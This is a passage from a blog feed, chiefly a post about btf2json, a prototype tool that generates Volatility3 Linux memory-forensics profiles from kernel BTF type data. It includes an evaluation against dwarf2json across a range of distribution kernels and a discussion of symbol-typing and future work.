      <p>Some IOS images are ELF files; however, the <code class="language-plaintext highlighter-rouge">e_machine</code> entry is complete nonsense. For example, it’s “CDS VISIUMcore processor” for the example from the introduction. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:2" role="doc-endnote">
      <p>They really do a lot of awesome stuff for firmware analysis! <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:3" role="doc-endnote">
      <p>What would be quite important are axis labels though … but apparently the best Rust plotting library <a href="https://github.com/plotters-rs/plotters/issues/329">does not support that</a>. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:4" role="doc-endnote">
      <p>Cross-entropy is not a metric (distance function) in the mathematical sense. <a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name></name></author><summary type="html"><![CDATA[Firmware reverse engineering comes with some unique challenges compared to the reversing of programs that run in the user space of some mainstream operating system. You will encounter one of them before Ghidra’s Code Browser even opens. Let’s illustrate it at a concrete example: I recently got myself some old Cisco devices off eBay as I was curious to have a look at their proprietary IOS operating system. However, when loading the IOS image into Ghidra1 you are greeted with the following screen: After removing one layer of self-extracting archive. &#8617;]]></summary></entry><entry><title type="html">Towards utilizing BTF Information in Linux Memory Forensics</title><link href="https://blog.eb9f.de/2024/11/10/btf2json.html" rel="alternate" type="text/html" title="Towards utilizing BTF Information in Linux Memory Forensics" /><published>2024-11-10T00:00:00+00:00</published><updated>2024-11-10T00:00:00+00:00</updated><id>https://blog.eb9f.de/2024/11/10/btf2json</id><content type="html" xml:base="https://blog.eb9f.de/2024/11/10/btf2json.html"><![CDATA[<p>This post is about some work that I did on automatic profile generation for memory forensics of Linux systems. To be upfront about it: This work is somewhat half-finished – it already does something quite useful, but it could do a lot more, and it has not been evaluated thoroughly enough to be considered “production ready”. The reason I decided to publish it anyway is that I believe that there is an interesting opportunity to change the way in which we generate profiles for the analysis of Linux memory images <em>in practice</em>. However, in order for it to become a production tool, at least one outstanding problem has to be addressed (I have some ideas on that one) and lots of coding work needs to be done – and I simply do not have the resources to work on that right now.</p>

<p><em>Note</em>: It has been a while since I actively worked on this project, so if someone else ran with this idea in the meantime, please let me know!</p>

<p><em>Note</em>: You can find the code of the prototype <a href="https://github.com/vobst/btf2json">here</a>.</p>

<p>So, what is this work about? To analyze memory images, we need <em>profiles</em>; usually those are generated from DWARF debug information, e.g., using tools like <a href="https://github.com/volatilityfoundation/dwarf2json"><code class="language-plaintext highlighter-rouge">dwarf2json</code></a>. However, here is the problem: DWARF is HUGE, so production kernels never ship with it; thus, it is highly unlikely that the kernel on the target whose memory we are analyzing comes with it. Luckily, most (but not all!) Linux distributions provide debug packages for their kernels. Consequently, a precondition for the generation of a profile is usually to figure out the distribution and exact version of the kernel in the image, and then to download the corresponding debug package.</p>

<p>But now comes the surprise: What if I tell you that virtually every production kernel that ships today comes with most of the information that we need to generate a profile for it? And that this information can be readily extracted from a raw memory image? Exploring this opportunity is what this work was all about.</p>

<p>To explain how and why this works, I’ll start by <a href="#whats-a-profile">introducing the notion of a <em>profile</em> in memory forensics</a>, <a href="#whats-the-problem">state the problem that we strive to address</a>, then <a href="#whats-our-solution-meet-the-bpf-type-format-btf">talk about the BPF Type Format (BTF)</a>, <a href="#what-we-have">describe how BTF can be used to generate a part of a profile</a> (+ an <a href="#evaluation">evaluation of our implementation</a>), <a href="#symbols-are-only-partially-solved">discuss some open questions around symbols</a>, and finally <a href="#call-to-action">outline what needs to be done for this project to reach its full potential</a>.</p>

<p>Let’s get started!</p>

<ol id="markdown-toc">
  <li><a href="#whats-a-profile" id="markdown-toc-whats-a-profile">What’s a Profile?</a></li>
  <li><a href="#whats-the-problem" id="markdown-toc-whats-the-problem">What’s the problem?</a></li>
  <li><a href="#whats-our-solution-meet-the-bpf-type-format-btf" id="markdown-toc-whats-our-solution-meet-the-bpf-type-format-btf">What’s our solution? Meet The BPF Type Format (BTF)!</a></li>
  <li><a href="#what-we-have" id="markdown-toc-what-we-have">What we have!</a>    <ol>
      <li><a href="#evaluation" id="markdown-toc-evaluation">Evaluation</a></li>
    </ol>
  </li>
  <li><a href="#symbols-are-only-partially-solved" id="markdown-toc-symbols-are-only-partially-solved">Symbols Are Only Partially Solved</a></li>
  <li><a href="#call-to-action" id="markdown-toc-call-to-action">Call to Action</a>    <ol>
      <li><a href="#working-on-a-raw-memory-image" id="markdown-toc-working-on-a-raw-memory-image">Working on a Raw Memory Image</a></li>
      <li><a href="#evaluating-the-symdb-approach" id="markdown-toc-evaluating-the-symdb-approach">Evaluating the <code class="language-plaintext highlighter-rouge">symdb</code> Approach</a></li>
    </ol>
  </li>
  <li><a href="#appendix-a-accessed-symbols" id="markdown-toc-appendix-a-accessed-symbols">Appendix A: Accessed Symbols</a></li>
</ol>

<h2 id="whats-a-profile">What’s a Profile?</h2>

<p>In short: A <em>profile</em> is a bunch of information that is used by <em>analyses</em> to make sense of the raw bytes in a memory image. In other words, it allows you to “bridge the semantic gap” between the 1s and 0s in a dump and the answer to interesting questions like “Which network connections did the process that was started at 13:37 make?”.</p>

<p>Usually, a profile consists of two parts: Information about <em>symbols</em> and <em>types</em> of the kernel that was running on the machine. Symbols are what get you a foot in the door, i.e. where an analysis starts. For example, the head of the list of all tasks can be found via the <code class="language-plaintext highlighter-rouge">init_task</code> symbol. From there onward, the types are what allows an analysis to make sense of the raw bytes it finds, to transition between objects by following pointers, and eventually to extract useful information.</p>

<p>Symbols are pretty simple, they are just <em>names</em> for memory <em>locations</em> together with the <em>type</em> of the data that is stored there. We will say that the triple of <code class="language-plaintext highlighter-rouge">(name, location, type)</code> forms a symbol.</p>

<p>Types are essentially recipes that tell you how to turn raw bytes back into a value of a C-type, i.e., they are a description of the memory layout of a C-type. We will say that the tuple <code class="language-plaintext highlighter-rouge">(c_type_kind, c_type_name, memory_layout)</code> forms a type.</p>
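<p>As a tiny illustrative stand-in for these two notions (the offsets and the address below are invented, not real <code class="language-plaintext highlighter-rouge">task_struct</code> layout data):</p>

```python
# Illustrative models of the two building blocks of a profile.
from dataclasses import dataclass, field

@dataclass
class Symbol:
    name: str       # e.g. "init_task"
    location: int   # virtual address, e.g. from System.map
    type_name: str  # name of the type stored at that address

@dataclass
class Type:
    kind: str  # "struct", "union", "typedef", "base", ...
    name: str
    # memory layout: member name -> (byte offset, member type name)
    layout: dict = field(default_factory=dict)

# Hypothetical excerpt of a profile (all values invented for illustration):
task_struct = Type("struct", "task_struct",
                   {"pid": (0x4e8, "int"), "comm": (0x5f8, "char[16]")})
init_task = Symbol("init_task", 0xFFFFFFFF83220840, "task_struct")
```

An analysis would start at <code class="language-plaintext highlighter-rouge">init_task.location</code> and then use <code class="language-plaintext highlighter-rouge">task_struct.layout</code> to pick fields like <code class="language-plaintext highlighter-rouge">comm</code> out of the raw bytes at that address.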

<h2 id="whats-the-problem">What’s the problem?</h2>

<p>The information in a profile is specific to a <em>particular compilation</em> of the operating system kernel, e.g., think of the linker’s freedom in arranging global variables or compile-time options that influence the layout of types. For Windows and macOS it is possible to build a profile database of all released kernels, i.e., you only have to find out which release you have in your dump and then you are ready to go. For Linux, there is a whole zoo of distros and even more kernel packages, a new one of which gets released every few days <sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>. Building a comprehensive Linux profile database is an endeavor that is doomed to fail.</p>

<p>There are reliable heuristics for inferring the release of the OS in your dump. Those work well for Windows, macOS and most Linux distros. However, the infeasibility of building a Linux profile database means that you must still use that information about the release to build the profile yourself. Usually this involves downloading the debug package of that exact release and running some tool against it. If this package does not exist, you are lost at that point. In particular this implies that you are completely lost if you are not analyzing a dump of a system running a mainstream Linux distro.</p>

<p>So, let’s get to the definition of the “profile generation problem”: Given only the bytes in a memory dump, tell me the symbols and types of the kernel that was running in there (maybe not all of them, but enough to do useful analyses).</p>

<p>Are there existing solutions to this problem? Yes, plenty. There is a whole pile of papers, some dating back many years, that identify and address it using all sorts of creative approaches, e.g., <a href="https://www.ndss-symposium.org/ndss-paper/an-os-agnostic-approach-to-memory-forensics/">Oliveri et al.</a>, <a href="https://dl.acm.org/doi/full/10.1145/3485471">Pagani et al.</a>, <a href="https://dl.acm.org/doi/abs/10.1145/3545948.3545980">Franzen et al.</a>, <a href="https://www.ndss-symposium.org/ndss-paper/auto-draft-193/">Qi et al.</a>, <a href="https://dfrws.org/presentation/automatic-profile-generation-for-live-linux-memory-analysis/">Cohen et al.</a>, or <a href="https://dl.acm.org/doi/abs/10.1145/2897845.2897850">Feng et al.</a>.</p>

<p>The “rule of the game” seems to be that you are allowed to do all sorts of up-front or on-demand analyses that involve the upstream Linux <em>source code</em>, and sometimes even the live system, to support your analysis of the raw image. We’ll also need to make use of the former crutch to make our solution work.</p>

<p>Why yet another solution, you may ask? Well, to the best of my knowledge, none of the proposed solutions has seen widespread adoption as of now. My hope is that the simplicity of our approach can make generating profiles for images that meet <em>certain requirements</em> as easy as running a CLI tool against them and waiting a few seconds. No need to do some complicated setup, download tons of dependencies, compile a thousand Linux kernels with an aging clang fork, and wait dozens of minutes or even hours for the profile to be finished – just download the binary and you are good to go <sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>. In short, our approach is less general, but hopefully more practical than previous work.</p>

<h2 id="whats-our-solution-meet-the-bpf-type-format-btf">What’s our solution? Meet The BPF Type Format (BTF)!</h2>

<p>You might have heard about <a href="https://datatracker.ietf.org/wg/bpf/about/">BPF</a>, if not, think of it as an abstract machine with its own bytecode format (a bit like the JVM or WASM). The Linux kernel has its own implementation of this abstract machine, the Linux BPF runtime, i.e., it can execute BPF bytecode programs. The whole point of this subsystem is to have a flexible, fast, safe, and portable way to extend the kernel at runtime. For example, I recently started using the <a href="https://github.com/evilsocket/opensnitch">opensnitch</a> application-level firewall, and it is in fact enforcing its network policies via multiple BPF programs.</p>

<p>Wait, did you just say <em>portable</em> kernel extensions?!? But how can a program that is compiled to some assembly-like bytecode language and operates on kernel data structures in memory be portable across kernel versions? After all, code like:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">my_struct</span> <span class="p">{</span>
<span class="cp">#ifdef BAR
</span>    <span class="kt">long</span> <span class="n">bar</span><span class="p">;</span>
<span class="cp">#else
</span>    <span class="kt">long</span> <span class="n">foo</span><span class="p">;</span>
<span class="cp">#endif
</span><span class="p">};</span>

<span class="kt">long</span> <span class="nf">read_foo</span><span class="p">(</span><span class="k">struct</span> <span class="n">my_struct</span><span class="o">*</span> <span class="n">x</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">x</span><span class="o">-&gt;</span><span class="n">foo</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>should be compiled down to instructions that have the answers to questions like “Is a <code class="language-plaintext highlighter-rouge">long</code> 4 or 8 bytes?” or “Was <code class="language-plaintext highlighter-rouge">BAR</code> defined?” hard-coded inside them. The solution to this apparent paradox lies in the interplay of four components: the <a href="https://clang.llvm.org/docs/AttributeReference.html#preserve-access-index"><code class="language-plaintext highlighter-rouge">preserve-access-index</code> C-language attribute</a>, the compiler toolchain, the user-space dynamic loader, and the kernel that the program should be loaded into.</p>

<p>In the program’s C source code, structures/unions whose member accesses should be portable must be marked with the <code class="language-plaintext highlighter-rouge">preserve-access-index</code> attribute <sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup>. The compiler will then generate the accessing code without hard-coded offsets and record which field of which type was accessed at a particular location in <a href="https://www.kernel.org/doc/html/latest/bpf/llvm_reloc.html#co-re-relocations">relocation information</a>. This information is processed by the user-space dynamic loader running on the target system, which adjusts the program to the layout of types in the running kernel before loading it. The information about memory layout of types is supplied by the running kernel itself via the files in the <code class="language-plaintext highlighter-rouge">/sys/kernel/btf/</code> pseudo file system.</p>

<p>Whaaat? Each and every kernel out there that wants to support portable BPF programs (pretty much every single one) must ship with a description of the memory layout of all its types? That’s like having Christmas and your birthday together! Indeed, the relevant information is stored in the <code class="language-plaintext highlighter-rouge">.BTF</code> sections of the kernel and module ELF files in the <a href="https://www.kernel.org/doc/html/latest/bpf/btf.html">well documented BPF Type Format</a>.</p>

<p>This solves the whole <em>types</em> part of the “profile generation problem” for most modern kernels without the need for a debug build. Furthermore, since the kernel image is contiguous in physical memory, it is straightforward to carve the section from a memory image.</p>
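<p>As a rough illustration of that carving step, one can scan a raw dump for the BTF header magic and cut the section out based on the header’s length fields. This is a sketch based on the documented v1 header layout; a real carver would add more sanity checks:</p>

```python
# Sketch: carve .BTF blobs out of a raw memory dump by scanning for the
# BTF header magic 0xeb9f (little-endian) followed by version 1.
import struct

BTF_NEEDLE = b"\x9f\xeb\x01"  # u16 magic 0xeb9f (LE), u8 version = 1
# struct btf_header: magic u16, version u8, flags u8, hdr_len u32,
#                    type_off u32, type_len u32, str_off u32, str_len u32
HDR = struct.Struct("<HBBIIIII")

def carve_btf(image: bytes) -> list:
    """Return (offset, raw bytes) for every plausible .BTF blob in `image`."""
    hits, pos = [], 0
    while (pos := image.find(BTF_NEEDLE, pos)) != -1:
        if pos + HDR.size <= len(image):
            hdr = HDR.unpack_from(image, pos)
            hdr_len, type_off, type_len, str_off, str_len = hdr[3:]
            total = hdr_len + max(type_off + type_len, str_off + str_len)
            if hdr_len >= HDR.size and type_len and str_len and pos + total <= len(image):
                hits.append((pos, image[pos : pos + total]))
        pos += 1
    return hits
```

On a real dump you would additionally validate each carved blob, e.g., by attempting to parse its type section.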

<p><em>Note:</em> The reason why it is feasible to include the BTF information in production kernels is that it is much smaller than DWARF debug information. In part, this is achieved by the format being much less wasteful with disk space; however, it is also fundamentally less expressive. Thus, it is a priori not clear that BTF contains all the type information needed by memory forensics analyses. It was part of this work to establish that this is indeed the case (not too surprising given BTF’s original use case described above). I recommend <a href="https://nakryiko.com/posts/btf-dedup/">this post</a> for an introduction to the BTF format and its relationship to DWARF.</p>

<p><em>Note:</em> BTF has been around for quite a while, since <a href="https://github.com/torvalds/linux/commit/69b693f0aefa0ed521e8bd02260523b5ae446ad7">Linux 4.18</a> to be precise, so it is not like you will only find it in bleeding edge kernels.</p>

<h2 id="what-we-have">What we have!</h2>

<p>Let’s start with the good news: the <a href="https://github.com/vobst/btf2json">released prototype <code class="language-plaintext highlighter-rouge">btf2json</code></a> can generate working Volatility3 profiles! At the time of our evaluation, those profiles were even “better” than the ones generated by <code class="language-plaintext highlighter-rouge">dwarf2json</code>, in the sense that they supported more analyses on more memory images. It is also worth noting that the profile generation is about 10x faster.</p>

<p>Currently, <code class="language-plaintext highlighter-rouge">btf2json</code> accepts either an ELF <code class="language-plaintext highlighter-rouge">vmlinux</code> image or a raw <code class="language-plaintext highlighter-rouge">.BTF</code>-section for the type information, as well as a <code class="language-plaintext highlighter-rouge">System.map</code> file for symbol information, to generate a Volatility3 profile.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>btf2json <span class="nt">--help</span>
Generate Volatility 3 ISF files from BTF <span class="nb">type </span>information

Usage: btf2json <span class="o">[</span>OPTIONS]

Options:
      <span class="nt">--btf</span> &lt;BTF&gt;
          BTF file <span class="k">for </span>obtaining <span class="nb">type </span>information <span class="o">(</span>can also be a kernel image<span class="o">)</span>

      <span class="nt">--map</span> &lt;MAP&gt;
          System.map file <span class="k">for </span>obtaining symbol names and addresses

      <span class="nt">--banner</span> &lt;BANNER&gt;
          Linux banner.

          Mandatory <span class="k">if </span>using a BTF file <span class="k">for </span><span class="nb">type </span>information. Takes precedence over all other possible sources of banner information.

      <span class="nt">--version</span>
          Print btf2json version

      <span class="nt">--verbose</span>
          Display debug output

      <span class="nt">--debug</span>
          Display more debug output

      <span class="nt">--image</span> &lt;IMAGE&gt;
          Memory image to extract <span class="nb">type </span>and/or symbol information from <span class="o">(</span>not implemented<span class="o">)</span>

  <span class="nt">-h</span>, <span class="nt">--help</span>
          Print <span class="nb">help</span> <span class="o">(</span>see a summary with <span class="s1">'-h'</span><span class="o">)</span>
<span class="nv">$ </span>btf2json <span class="nt">--btf</span> path/to/vmlinux/or/btf/section <span class="nt">--map</span> path/to/system/map
<span class="c"># prints ISF to stdout</span>
</code></pre></div></div>

<p><em>Note</em>: If you use just the <code class="language-plaintext highlighter-rouge">.BTF</code>-section for type information, you also need to provide a Linux banner so that Volatility can match the profile to a memory image.</p>

<p>The resulting profile can then be used to drive Volatility analyses, just like any other profile that you would have previously generated with <code class="language-plaintext highlighter-rouge">dwarf2json</code>.</p>

<p>In its current form, <code class="language-plaintext highlighter-rouge">btf2json</code> already has one key advantage over <code class="language-plaintext highlighter-rouge">dwarf2json</code> (besides being much faster :P): no need for debug kernels! This means you can generate profiles for custom, self-compiled kernels (useful when investigating nerds like me) or distributions that do not provide kernel debug symbols (e.g., Arch Linux). Furthermore, you do not have to bother with figuring out the exact kernel release and searching the corresponding debug package in a gigantic repository. Just grab the <code class="language-plaintext highlighter-rouge">vmlinux</code> and <code class="language-plaintext highlighter-rouge">System.map</code> from the file system and you are good to go!</p>

<h3 id="evaluation">Evaluation</h3>

<p>We evaluated <code class="language-plaintext highlighter-rouge">btf2json</code> on the following kernels:</p>

<ul>
  <li>Almalinux 9
    <ul>
      <li>kernel: 5.14.0-362.8.1.el9_3.x86_64 (<code class="language-plaintext highlighter-rouge">f844e</code>)</li>
    </ul>
  </li>
  <li>Archlinux
    <ul>
      <li>kernel: 6.6.7-arch1-1 (<code class="language-plaintext highlighter-rouge">59a42</code>)</li>
      <li>kernel: 6.11.6-arch1-1 (<code class="language-plaintext highlighter-rouge">a54bd</code>)</li>
    </ul>
  </li>
  <li>Fedora 38
    <ul>
      <li>kernel: 6.6.6-100.fc38.x86_64 (<code class="language-plaintext highlighter-rouge">85565</code>)</li>
    </ul>
  </li>
  <li>Fedora 39
    <ul>
      <li>kernel: 6.6.6-200.fc39.x86_64 (<code class="language-plaintext highlighter-rouge">7bd7a</code>)</li>
      <li>kernel: 6.11.6-100.fc39.x86_64 (<code class="language-plaintext highlighter-rouge">d2be6</code>)</li>
    </ul>
  </li>
  <li>Fedora 40
    <ul>
      <li>kernel: 6.11.6-200.fc40.x86_64 (<code class="language-plaintext highlighter-rouge">bbbb3</code>)</li>
    </ul>
  </li>
  <li>Centos 9s
    <ul>
      <li>kernel: 5.14.0-391.el9.x86_64 (<code class="language-plaintext highlighter-rouge">20d08</code>)</li>
    </ul>
  </li>
  <li>Debian 11
    <ul>
      <li>kernel: 5.10.0-26-amd64 (<code class="language-plaintext highlighter-rouge">2c41e</code>)</li>
    </ul>
  </li>
  <li>Rocky 8
    <ul>
      <li>kernel: 4.18.0-513.9.1.el8_9.x86_64 (<code class="language-plaintext highlighter-rouge">9a6e2</code>)</li>
    </ul>
  </li>
  <li>Ubuntu 22.04
    <ul>
      <li>kernel: 5.15.0-88-generic (<code class="language-plaintext highlighter-rouge">6f76f</code>)</li>
    </ul>
  </li>
  <li>Ubuntu 23.10
    <ul>
      <li>kernel: 6.5.0-10-generic (<code class="language-plaintext highlighter-rouge">ccbb5</code>)</li>
    </ul>
  </li>
  <li>Kali Rolling
    <ul>
      <li>kernel: 6.11.2-amd64 (<code class="language-plaintext highlighter-rouge">c0965</code>)</li>
    </ul>
  </li>
</ul>

<p>For each kernel, we</p>

<ul>
  <li>used <code class="language-plaintext highlighter-rouge">dwarf2json</code> (with debug kernel + system map) and <code class="language-plaintext highlighter-rouge">btf2json</code> (with normal kernel + system map) to generate a profile (we also measured the time this took the tools),</li>
  <li>booted the kernel in a VM,</li>
  <li>took a memory snapshot of the VM,</li>
  <li>ran all upstream Volatility3 Linux analysis plugins on the memory image, with the debug output cranked up to the highest level.</li>
</ul>

<p>For each analysis the</p>

<ul>
  <li>exit code,</li>
  <li>stdout stream,</li>
  <li>stderr stream,</li>
</ul>

<p>were saved.</p>

<p>We then compared the exit codes, and diffed the stdout and stderr streams, of the analysis plugins with the <code class="language-plaintext highlighter-rouge">dwarf2json</code> and <code class="language-plaintext highlighter-rouge">btf2json</code> profiles, respectively. Cases where the exit code and/or the stdout/stderr streams differed were manually investigated.</p>
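<p>The comparison step can be sketched as a small harness (hypothetical; the command lines a real run would use are Volatility’s, not shown here):</p>

```python
# Sketch: run the same plugin with two different profiles and check whether
# exit code, stdout, and stderr all agree.
import subprocess

def run(cmd: list) -> tuple:
    """Capture (exit code, stdout, stderr) of one invocation."""
    p = subprocess.run(cmd, capture_output=True, text=True)
    return p.returncode, p.stdout, p.stderr

def agrees(cmd_a: list, cmd_b: list) -> bool:
    """True iff both invocations produce identical results."""
    return run(cmd_a) == run(cmd_b)
```

Any pair that does not agree is flagged for manual investigation.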

<p>In total, we evaluated 32 analysis plugins on memory images of 13 different kernels, resulting in a total of <strong>416 unique pairs of memory image and analysis plugin</strong>.</p>

<ul>
  <li>In 394 cases the exit codes of the plugins running with the <code class="language-plaintext highlighter-rouge">btf2json</code>- and <code class="language-plaintext highlighter-rouge">dwarf2json</code>-generated profiles were identical.</li>
  <li>In 9 cases the <code class="language-plaintext highlighter-rouge">btf2json</code> profile led to a successful analysis while the analysis with the <code class="language-plaintext highlighter-rouge">dwarf2json</code> profile failed. This was the case for the <code class="language-plaintext highlighter-rouge">linux.capabilities.Capabilities</code> plugin on all images but Fedora, Ubuntu 23.10, Kali and Archlinux (5 images), and for the <code class="language-plaintext highlighter-rouge">linux.check_syscall.Check_syscall</code> plugin on Fedora (4 images).</li>
  <li>In 13 cases the analysis failed with both profiles. This was the case for the <code class="language-plaintext highlighter-rouge">linux.vmayarascan.VmaYaraScan</code> plugin on all images.</li>
</ul>

<p>We tracked the reason for the failure of the <code class="language-plaintext highlighter-rouge">linux.capabilities.Capabilities</code> analysis with the <code class="language-plaintext highlighter-rouge">dwarf2json</code> profiles down to the fact that they assigned the <code class="language-plaintext highlighter-rouge">kernel_cap_t</code> type for the capabilities in <code class="language-plaintext highlighter-rouge">struct cred</code> while <code class="language-plaintext highlighter-rouge">btf2json</code> assigned the <code class="language-plaintext highlighter-rouge">struct kernel_cap_struct</code> type. While those are in fact related via a typedef, the Volatility3 framework differentiates between them in their implementation to obtain the capability bits. In particular, Volatility uses this distinction to differentiate between pre and post 6.3 kernels (which is why it works on Fedora, Ubuntu, Kali, and Arch), so we believe that there is a bug in the interplay of <code class="language-plaintext highlighter-rouge">dwarf2json</code>-profiles and Volatility on older kernels.</p>

<p>Concerning the failure of the <code class="language-plaintext highlighter-rouge">linux.check_syscall.Check_syscall</code> plugin on Fedora, we did not perform an in-depth investigation, however, it seems to be due to issues in the type information of the <code class="language-plaintext highlighter-rouge">dwarf2json</code> profile. With the <code class="language-plaintext highlighter-rouge">btf2json</code> profile the system call table is correctly extracted.</p>

<p>Finally, the <code class="language-plaintext highlighter-rouge">linux.vmayarascan.VmaYaraScan</code> plugin counts as a failure in both cases since it throws an exception if no rules are given.</p>

<p>Apart from the 9 cases where only the <code class="language-plaintext highlighter-rouge">btf2json</code> analysis was successful, the stdout streams of the analyses were identical. On the stderr streams, we observed slight differences in the <code class="language-plaintext highlighter-rouge">DEBUG</code>-level log messages that hint at differing inconsistencies in the type information of the profiles (<code class="language-plaintext highlighter-rouge">volatility3.framework.symbols: Unresolved reference: </code> messages). On average, running all analyses over an image with the <code class="language-plaintext highlighter-rouge">btf2json</code> profile reports 65 unique inconsistencies, whereas a run with the <code class="language-plaintext highlighter-rouge">dwarf2json</code> profile detects 90 such inconsistencies.</p>

<p>With regards to the average runtime, our evaluation showed that the profile generation of <code class="language-plaintext highlighter-rouge">btf2json</code> (1.54s) is significantly faster than that of <code class="language-plaintext highlighter-rouge">dwarf2json</code> (18.5s), i.e., we see a 12x speedup.</p>

<p><em>Note:</em> For the evaluation, we used Volatility3 at commit <code class="language-plaintext highlighter-rouge">a00a59cd235cb18b7dc28ccf2669e2a82368fab5</code>, <code class="language-plaintext highlighter-rouge">btf2json</code> at commit <code class="language-plaintext highlighter-rouge">18bd9d1015a7433a85ac2634a7a4f34f6d04c851</code>, and <code class="language-plaintext highlighter-rouge">dwarf2json</code> at commit <code class="language-plaintext highlighter-rouge">9f14607e0d339d463ea725fbd5c08aa7b7d40f75</code>.</p>

<h2 id="symbols-are-only-partially-solved">Symbols Are Only Partially Solved</h2>

<p>Sounds great, right? Well, unfortunately I must admit that <code class="language-plaintext highlighter-rouge">btf2json</code> has a dirty secret: the <code class="language-plaintext highlighter-rouge">symdb</code>.</p>

<p>Recall that we defined a symbol as the triple of <code class="language-plaintext highlighter-rouge">(name, location, type)</code>. We can get the names and locations from the <code class="language-plaintext highlighter-rouge">System.map</code>. However, while BTF is technically able to encode the types of global variables via the <a href="https://www.kernel.org/doc/html/latest/bpf/btf.html#btf-kind-var"><code class="language-plaintext highlighter-rouge">BTF_KIND_VAR</code></a> and <a href="https://www.kernel.org/doc/html/latest/bpf/btf.html#btf-kind-datasec"><code class="language-plaintext highlighter-rouge">BTF_KIND_DATASEC</code></a> entries, this is only done for the 400ish per-CPU variables. This leads us to our problem: How do we assign types to symbols?</p>

<p>Let’s take a step back and ask ourselves why we even <em>need</em> the type as part of our definition of a symbol. Symbols are usually the “entry point” for an analysis. Think of an analysis that lists all tasks: it will usually start at the <code class="language-plaintext highlighter-rouge">init_task</code> symbol and then traverse the dynamically allocated doubly linked list that hangs off it. This stage of “getting a foot in the door” is where the type of a symbol is needed, and in my experience each analysis only uses a handful of symbols for that purpose.</p>

<p>Therefore, we decided to measure which symbols have their types accessed by the existing Volatility analyses. To do so, we instrumented the <a href="https://github.com/volatilityfoundation/volatility3/blob/1e871af0644fbd03ba22085241ed795104ccc580/volatility3/framework/interfaces/symbols.py#L60">method responsible for retrieving the type of a symbol</a> and re-ran all analyses. We found that only <strong>32</strong> of the 150k+ unique symbols have their type accessed. See the Appendix for a <a href="#appendix-a-accessed-symbols">list of those symbols</a>.</p>

<p>As we can see, it is only a tiny fraction of the 150k+ symbols that exist in a Linux kernel.</p>

<p>This leads me to a bold claim: It is feasible to build and maintain a map <code class="language-plaintext highlighter-rouge">([kernel m.m.p version], symbol name) -&gt; (type name)</code> that works in practice.</p>

<p>I believe that this works for three reasons:</p>

<ol>
  <li>The subset of symbols that are actually used by analyses is fairly small.</li>
  <li>The type names of these symbols are very stable between kernel versions.</li>
  <li>The type names of these symbols do not depend on build-time configuration options.</li>
</ol>

<p>We call this mapping <code class="language-plaintext highlighter-rouge">symdb</code> and embed it into the final, stand-alone <code class="language-plaintext highlighter-rouge">btf2json</code> executable. Thus, under the above assumptions, <code class="language-plaintext highlighter-rouge">btf2json</code> can generate working profiles just from a kernel’s BTF information and <code class="language-plaintext highlighter-rouge">System.map</code>.</p>

<p><em>Note</em>: This solution is, in general, inferior to what <code class="language-plaintext highlighter-rouge">dwarf2json</code> does. The <code class="language-plaintext highlighter-rouge">symdb</code> will contain missing or wrong entries. I just believe that the entries <em>that matter</em> will be correct due to the above considerations.</p>

<p><em>Note</em>: Currently the <code class="language-plaintext highlighter-rouge">symdb</code> is a mapping <code class="language-plaintext highlighter-rouge">(symbol name) -&gt; (type name)</code> generated from some kernel I had lying around (and it still works fine for Linux 4.18-6.11!!!). Generating a proper <code class="language-plaintext highlighter-rouge">symdb</code> and rigorously evaluating the approach is part of the future work outlined below.</p>
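<p>To make the idea concrete, here is a minimal sketch of how such a lookup could be wired into profile generation. The entries and the output shape are illustrative only, not the real <code class="language-plaintext highlighter-rouge">symdb</code> contents or the actual Volatility profile format:</p>

```python
# Hypothetical symdb: a static mapping from symbol name to type name,
# consulted when emitting profile entries. Entries below are examples.
SYMDB = {
    "init_task": "task_struct",
    "modules":   "list_head",
    "init_mm":   "mm_struct",
}

def profile_symbol(name, address):
    """Build one profile entry from System.map data plus the symdb."""
    entry = {"address": address}
    type_name = SYMDB.get(name)
    if type_name is not None:  # only a handful of symbols need a type
        entry["type"] = {"kind": "struct", "name": type_name}
    return name, entry

print(profile_symbol("init_task", 0xFFFFFFFF83215940))
```

<p>Symbols absent from the database simply get no type attached, which, per the measurements above, should be harmless for the vast majority of them.</p>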

<h2 id="call-to-action">Call to Action</h2>

<p>Now, as I said above, I consider this work to be in a half-finished-but-usable state. It can already bring a real benefit to the community, but it is far from reaching its full potential. Thus, here is my vision of what <code class="language-plaintext highlighter-rouge">btf2json</code> could become through the investment of considerable time and energy (which I currently do not have). If the community decides that it is a goal worth pursuing, I am confident that we can get there.</p>

<h3 id="working-on-a-raw-memory-image">Working on a Raw Memory Image</h3>

<p>Recall that the ultimate goal of automatic profile generation is to generate the profile directly from a raw memory image. For that to work, we would roughly need to add the following:</p>

<ul>
  <li><strong>Carve the banner from the image</strong> (conceptually trivial, little work).</li>
  <li><strong>Carve the <code class="language-plaintext highlighter-rouge">.BTF</code> section from the image</strong> (conceptually simple, little to medium work). Scanning for the magic bytes <code class="language-plaintext highlighter-rouge">0xeb9f</code> and performing some heuristic checks on matches is sufficient; we already prototyped and evaluated this.</li>
  <li><strong>Extract kallsyms from the image</strong>, either
    <ul>
      <li>using a carving approach like <a href="https://github.com/marin-m/vmlinux-to-elf"><code class="language-plaintext highlighter-rouge">vmlinux-to-elf</code></a> (conceptually simple, loooots of work),</li>
      <li>using an emulation approach as done in academic papers (conceptually advanced, medium work). This introduces some big dependencies that make shipping a stand-alone cross-platform executable hard.</li>
    </ul>
  </li>
</ul>
